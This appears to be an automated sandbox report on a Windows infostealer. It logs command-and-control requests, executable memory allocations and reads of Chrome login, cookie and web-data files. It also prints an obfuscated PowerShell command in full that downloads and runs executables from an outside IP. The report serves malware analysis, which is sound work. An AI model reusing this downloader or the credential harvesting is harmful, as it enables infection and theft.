bKNETpRzaJZTSp5EMFdVWo50VNNzYqllMBpXWwEEVPl3aU1kMrpWT0UkMOhXRtpFboRkWwkEVOlXREplaKRlWpdXaJ9kSp9UaJpmT4VkMNpmRt10dJJTW3lFRaxmRXlFNNpXTtJ1VPVTTE1UaCpWTtRGRPdXVH5UeBRkWspUbJNXSpRVavpWS6FkaaNTSyklaCpnTw0kaN1mVUpVboRUTrp0VOpXQEpVMJRVT0sGRNlXR6llaWdUTy0keOJTSDxUa0sWS2k0QalXRyk1djpmWrZEVPpmSE9kaCpXWxEkeZRTRy4UeNR1Ttp1RONzYUpVMRRlT10kMNlmSX1Ua3lWSPpUaPlWVq10aWJTWqpEROhXRX1UMZpWW61keOVTRq50MrpWWyklaOJTRtp1aspmTspVbaJTRH9EbGpWSzlUeQl2bql0dnRkWxE1RadXRE1UeVR0T1UlMZhmUy4UbCRlW0U1VZhXRy00MNpmT0kVbOBzaU10akRUT4l0QMlGNrlkNJNkTpRGValmTXpFeNdlT6lFRNNTUX9EeN1WW0k1RaBTWqpleFpXTspEVOh3Yq5EenpmW0MGRPl2cu9UaFdEZoJVRkRjVtl0cVp2TpFFWkZnVXJGcSZ0YsZ1RiRlSDxUaV1GZwJ1MZJkSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUeWJjWoVzVZ5kQTJGaKNjW2pESVl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarlmYzkTbiJXNXZ1bBlmYzkTbiJXNXZVavpWSsFzVZ9kVGVFRKNETptWaiNTOtJmc1clVvFUaiNTOtJmc1clVp9maJxWMXl1TWZUVIp0QMl2aslkNJlmYwFzRaJkTYFWa3lWSp9maJhkRFZVa3lWSwwWbRdWUq50Z0UUSzZUbiZHbyMmeW1mW2pESVd2YElkekNjYrVzVhhlSp9UaJhlWXVzVhhlSDxUOKNkYxkzVaRVOTlFcOhVUp9maJxWNyImNWdlYwJlbJNXSD10dBRUT3FkaJZTSDJGaSNzY2JkbJNXSTlFbKNjYMJ0QhBjVzIGVCNFTnF1VaBnWXFmaWd0Y6J0QkZXNrlkNJlnW5lTbJNXS55kMjRUT1NmaNh3dT9UMVpmT1NmeNl2bqlka5ckYpdXaJNFdrlkNJNVZ5JlbiFTOykVa3lWSzZ1MixmTslkNJlmY2xmMaxmSul0cJNFZuFTaiZHZzI2TKl2TptGSkBnTtl0cJlWTxUkaMBTTU1UdnRUT5RzUONTRqlkNJN0YwpUelZTS5JWb1c1U3x2aJNXSp1UeRNzYsJlbJZTSTpFdG1GV5ZlMjZlSDxUaNVUV0lkaNVlTWJVVKl2TpV1VihWNwEVUKNETp1keNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiEGM0AjZkFmN3YjZjFTZ5MGOyMWO2UGZyMWO0IWYjR2MiwiI4cTMkVTM5cjMwAzNhRmZyEDOkJTM2MWY1YWZ1M2N2UDMyEDZwEWOzIiOiUWY3YGN3kTY1MzYyYWN1YWN5YTMjRjM1MGO5EWY0ImYiwiIwQWMzIjYmhDN2kTZlBTN1cjM0IzYyYzN0MjY2gDNxgTO1UTNyUGOmJiOigTNihjY5UDMlRmYykDOidjY3cDNmNDOxQGNiRmMlhDOis3W
request GET http://94.131.112.154/PythonphpGeneratortemporary.php?JGvO=Epaz1Kj512gUSKaunbDS8tIMq1b&udXBuXppBF=k9NirryZAEUfpr62VhNI9tS&c72f30bfdace9699f08f265105715607=QYyMzYwImY4cjMjJWNzcTZ1ATY0kDZ1MzYkBDZygjM0YGNyQmZlVjZ0IjN1ITNxEDOzADO5QjM&12bb8387f02771b3530361d45f8bc47f=wYjlDMyYDO0YWMwUjNzI2YhVGM0QDZycTN2QjM0YDMlFzNyUmZmFzM&9ff31bbcdffb4b2ee507e80d804540cc=QX9JSUNJiOiEGM0AjZkFmN3YjZjFTZ5MGOyMWO2UGZyMWO0IWYjR2MiwiI3QmN5MGM5MWZyUjNxMGMwUWMjJTZ0kDOycTMwUmZmFmZkljY1ITY4IiOiUWY3YGN3kTY1MzYyYWN1YWN5YTMjRjM1MGO5EWY0ImYiwiIwQWMzIjYmhDN2kTZlBTN1cjM0IzYyYzN0MjY2gDNxgTO1UTNyUGOmJiOigTNihjY5UDMlRmYykDOidjY3cDNmNDOxQGNiRmMlhDOis3W
request POST http://94.131.112.154/PythonphpGeneratortemporary.php?JGvO=Epaz1Kj512gUSKaunbDS8tIMq1b&udXBuXppBF=k9NirryZAEUfpr62VhNI9tS&c72f30bfdace9699f08f265105715607=QYyMzYwImY4cjMjJWNzcTZ1ATY0kDZ1MzYkBDZygjM0YGNyQmZlVjZ0IjN1ITNxEDOzADO5QjM&12bb8387f02771b3530361d45f8bc47f=wYjlDMyYDO0YWMwUjNzI2YhVGM0QDZycTN2QjM0YDMlFzNyUmZmFzM
request GET https://pastebin.com/raw/Cs9EzneX
request POST http://94.131.112.154/PythonphpGeneratortemporary.php?JGvO=Epaz1Kj512gUSKaunbDS8tIMq1b&udXBuXppBF=k9NirryZAEUfpr62VhNI9tS&c72f30bfdace9699f08f265105715607=QYyMzYwImY4cjMjJWNzcTZ1ATY0kDZ1MzYkBDZygjM0YGNyQmZlVjZ0IjN1ITNxEDOzADO5QjM&12bb8387f02771b3530361d45f8bc47f=wYjlDMyYDO0YWMwUjNzI2YhVGM0QDZycTN2QjM0YDMlFzNyUmZmFzM
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 2564
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73bc2000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2688
region_size: 1376256
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02990000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2688
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02aa0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2688
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72891000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2688
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0262a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2688
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72892000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2688
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02622000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2688
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02632000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2688
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02aa1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2688
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02aa2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2688
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0269a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2688
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02633000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2688
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02634000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2688
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026ab000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2688
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026a7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2688
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0262b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2688
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02692000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2688
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026a5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2688
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02635000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2688
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0269c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2688
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02930000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2688
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02636000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2688
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026ac000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2688
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02693000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2688
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02694000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2688
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02695000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2688
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02696000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2688
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02697000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2688
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02698000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2688
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02699000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2688
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a90000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2688
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a91000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2688
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a92000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2688
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a93000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2688
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a94000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2688
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a95000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2688
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a96000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2688
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a97000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2688
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a98000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2688
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a99000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2688
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a9a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2688
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a9b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2688
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a9c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2688
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a9d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2688
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a9e000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2688
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a9f000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2688
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c50000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2688
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c51000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2688
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c52000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2688
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c53000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
Time & API Arguments Status Return Repeated

GetDiskFreeSpaceExW

total_number_of_free_bytes: 13317013504
free_bytes_available: 13317013504
root_path: C:\
total_number_of_bytes: 34252779520
1 1 0
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Web Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\LocalPrefs.json
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Web Data-journal
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Cookies-journal
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Cookies-journal
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local State
file C:\Users\test22\AppData\Local\Temp\I8Z7Joxb0y.bat
file C:\Users\test22\AppData\Roaming\host1.exe
file C:\Users\test22\AppData\Roaming\system32.exe
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function MnCAu($JwXKrhDlRivPRs, $CSqvRkWsqkA){[IO.File]::WriteAllBytes($JwXKrhDlRivPRs, $CSqvRkWsqkA)};function XszcGdVlHyMMWW($JwXKrhDlRivPRs){if($JwXKrhDlRivPRs.EndsWith((ZSExtBzusbrVsk @(76638,76692,76700,76700))) -eq $True){Start-Process (ZSExtBzusbrVsk @(76706,76709,76702,76692,76700,76700,76643,76642,76638,76693,76712,76693)) $JwXKrhDlRivPRs}else{Start-Process $JwXKrhDlRivPRs}};function QXRFnJUoDIK($EZeJuqGUYsRSuxjBdAY){$lklkVjgHYMCkOvnobVk = New-Object (ZSExtBzusbrVsk @(76670,76693,76708,76638,76679,76693,76690,76659,76700,76697,76693,76702,76708));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$CSqvRkWsqkA = $lklkVjgHYMCkOvnobVk.DownloadData($EZeJuqGUYsRSuxjBdAY);return $CSqvRkWsqkA};function ZSExtBzusbrVsk($ylkB){$TsyEWI=76592;$EIrofWZToIZNi=$Null;foreach($hHVHDWGIHgsCmBjRs in $ylkB){$EIrofWZToIZNi+=[char]($hHVHDWGIHgsCmBjRs-$TsyEWI)};return $EIrofWZToIZNi};function XeKyUELvjZOVnMLkCD(){$txkviPAwby = $env:AppData + '\';$eZbyJ = $txkviPAwby + 'host1.exe'; if (Test-Path -Path $eZbyJ){XszcGdVlHyMMWW $eZbyJ;}Else{ $mEkrPEVUnvHtBs = QXRFnJUoDIK (ZSExtBzusbrVsk @(76696,76708,76708,76704,76650,76639,76639,76644,76645,76638,76646,76647,76638,76642,76642,76648,76638,76644,76648,76639,76696,76703,76707,76708,76641,76638,76693,76712,76693));MnCAu $eZbyJ $mEkrPEVUnvHtBs;XszcGdVlHyMMWW $eZbyJ;}$PXnzJ = $txkviPAwby + 'system32.exe'; if (Test-Path -Path $PXnzJ){XszcGdVlHyMMWW $PXnzJ;}Else{ $gpdHJmGBeHRamC = QXRFnJUoDIK (ZSExtBzusbrVsk @(76696,76708,76708,76704,76650,76639,76639,76644,76645,76638,76646,76647,76638,76642,76642,76648,76638,76644,76648,76639,76707,76713,76707,76708,76693,76701,76643,76642,76638,76693,76712,76693));MnCAu $PXnzJ $gpdHJmGBeHRamC;XszcGdVlHyMMWW $PXnzJ;};$oaxCdtTRdtQjSGzhkBM = $txkviPAwby + '123.txt';If(Test-Path -Path $oaxCdtTRdtQjSGzhkBM){Invoke-Item $oaxCdtTRdtQjSGzhkBM;}Else{ $OcHRVIXAgnJxIm = QXRFnJUoDIK (ZSExtBzusbrVsk @(76696,76708,76708,76704,76650,76639,76639,76644,76645,76638,76646,76647,76638,76642,76642,76648,76638,76644,76648,76639,76641,76642,76643,76638,76708,76712,76708));MnCAu $oaxCdtTRdtQjSGzhkBM $OcHRVIXAgnJxIm;Invoke-Item $oaxCdtTRdtQjSGzhkBM;};;;;}XeKyUELvjZOVnMLkCD;" uac
cmdline powershell.exe -ExecutionPolicy UnRestricted function MnCAu($JwXKrhDlRivPRs, $CSqvRkWsqkA){[IO.File]::WriteAllBytes($JwXKrhDlRivPRs, $CSqvRkWsqkA)};function XszcGdVlHyMMWW($JwXKrhDlRivPRs){if($JwXKrhDlRivPRs.EndsWith((ZSExtBzusbrVsk @(76638,76692,76700,76700))) -eq $True){Start-Process (ZSExtBzusbrVsk @(76706,76709,76702,76692,76700,76700,76643,76642,76638,76693,76712,76693)) $JwXKrhDlRivPRs}else{Start-Process $JwXKrhDlRivPRs}};function QXRFnJUoDIK($EZeJuqGUYsRSuxjBdAY){$lklkVjgHYMCkOvnobVk = New-Object (ZSExtBzusbrVsk @(76670,76693,76708,76638,76679,76693,76690,76659,76700,76697,76693,76702,76708));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$CSqvRkWsqkA = $lklkVjgHYMCkOvnobVk.DownloadData($EZeJuqGUYsRSuxjBdAY);return $CSqvRkWsqkA};function ZSExtBzusbrVsk($ylkB){$TsyEWI=76592;$EIrofWZToIZNi=$Null;foreach($hHVHDWGIHgsCmBjRs in $ylkB){$EIrofWZToIZNi+=[char]($hHVHDWGIHgsCmBjRs-$TsyEWI)};return $EIrofWZToIZNi};function XeKyUELvjZOVnMLkCD(){$txkviPAwby = $env:AppData + '\';$eZbyJ = $txkviPAwby + 'host1.exe'; if (Test-Path -Path $eZbyJ){XszcGdVlHyMMWW $eZbyJ;}Else{ $mEkrPEVUnvHtBs = QXRFnJUoDIK (ZSExtBzusbrVsk @(76696,76708,76708,76704,76650,76639,76639,76644,76645,76638,76646,76647,76638,76642,76642,76648,76638,76644,76648,76639,76696,76703,76707,76708,76641,76638,76693,76712,76693));MnCAu $eZbyJ $mEkrPEVUnvHtBs;XszcGdVlHyMMWW $eZbyJ;}$PXnzJ = $txkviPAwby + 'system32.exe'; if (Test-Path -Path $PXnzJ){XszcGdVlHyMMWW $PXnzJ;}Else{ $gpdHJmGBeHRamC = QXRFnJUoDIK (ZSExtBzusbrVsk @(76696,76708,76708,76704,76650,76639,76639,76644,76645,76638,76646,76647,76638,76642,76642,76648,76638,76644,76648,76639,76707,76713,76707,76708,76693,76701,76643,76642,76638,76693,76712,76693));MnCAu $PXnzJ $gpdHJmGBeHRamC;XszcGdVlHyMMWW $PXnzJ;};$oaxCdtTRdtQjSGzhkBM = $txkviPAwby + '123.txt';If(Test-Path -Path $oaxCdtTRdtQjSGzhkBM){Invoke-Item $oaxCdtTRdtQjSGzhkBM;}Else{ $OcHRVIXAgnJxIm = QXRFnJUoDIK (ZSExtBzusbrVsk @(76696,76708,76708,76704,76650,76639,76639,76644,76645,76638,76646,76647,76638,76642,76642,76648,76638,76644,76648,76639,76641,76642,76643,76638,76708,76712,76708));MnCAu $oaxCdtTRdtQjSGzhkBM $OcHRVIXAgnJxIm;Invoke-Item $oaxCdtTRdtQjSGzhkBM;};;;;}XeKyUELvjZOVnMLkCD;" uac
file C:\Users\test22\AppData\Roaming\host1.exe
file C:\Users\test22\AppData\Roaming\system32.exe
wmi SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: powershell.exe
parameters: -ExecutionPolicy UnRestricted function MnCAu($JwXKrhDlRivPRs, $CSqvRkWsqkA){[IO.File]::WriteAllBytes($JwXKrhDlRivPRs, $CSqvRkWsqkA)};function XszcGdVlHyMMWW($JwXKrhDlRivPRs){if($JwXKrhDlRivPRs.EndsWith((ZSExtBzusbrVsk @(76638,76692,76700,76700))) -eq $True){Start-Process (ZSExtBzusbrVsk @(76706,76709,76702,76692,76700,76700,76643,76642,76638,76693,76712,76693)) $JwXKrhDlRivPRs}else{Start-Process $JwXKrhDlRivPRs}};function QXRFnJUoDIK($EZeJuqGUYsRSuxjBdAY){$lklkVjgHYMCkOvnobVk = New-Object (ZSExtBzusbrVsk @(76670,76693,76708,76638,76679,76693,76690,76659,76700,76697,76693,76702,76708));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$CSqvRkWsqkA = $lklkVjgHYMCkOvnobVk.DownloadData($EZeJuqGUYsRSuxjBdAY);return $CSqvRkWsqkA};function ZSExtBzusbrVsk($ylkB){$TsyEWI=76592;$EIrofWZToIZNi=$Null;foreach($hHVHDWGIHgsCmBjRs in $ylkB){$EIrofWZToIZNi+=[char]($hHVHDWGIHgsCmBjRs-$TsyEWI)};return $EIrofWZToIZNi};function XeKyUELvjZOVnMLkCD(){$txkviPAwby = $env:AppData + '\';$eZbyJ = $txkviPAwby + 'host1.exe'; if (Test-Path -Path $eZbyJ){XszcGdVlHyMMWW $eZbyJ;}Else{ $mEkrPEVUnvHtBs = QXRFnJUoDIK (ZSExtBzusbrVsk @(76696,76708,76708,76704,76650,76639,76639,76644,76645,76638,76646,76647,76638,76642,76642,76648,76638,76644,76648,76639,76696,76703,76707,76708,76641,76638,76693,76712,76693));MnCAu $eZbyJ $mEkrPEVUnvHtBs;XszcGdVlHyMMWW $eZbyJ;}$PXnzJ = $txkviPAwby + 'system32.exe'; if (Test-Path -Path $PXnzJ){XszcGdVlHyMMWW $PXnzJ;}Else{ 